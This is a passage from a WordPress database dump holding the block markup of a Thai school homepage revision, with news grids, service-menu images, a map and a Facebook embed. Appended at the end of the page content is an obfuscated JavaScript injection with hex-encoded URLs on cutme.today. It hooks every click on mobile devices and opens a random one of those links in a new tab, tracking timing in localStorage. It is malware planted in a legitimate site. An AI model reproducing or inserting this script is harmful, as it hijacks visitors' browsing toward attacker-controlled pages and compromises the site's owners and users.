{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:21:24','2024-08-08 14:21:24','',14,'http://pakhaeng.ssk.in.th/?p=751',0,'revision','',0),
(752,1,'2024-08-08 21:26:31','2024-08-08 14:26:31','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery 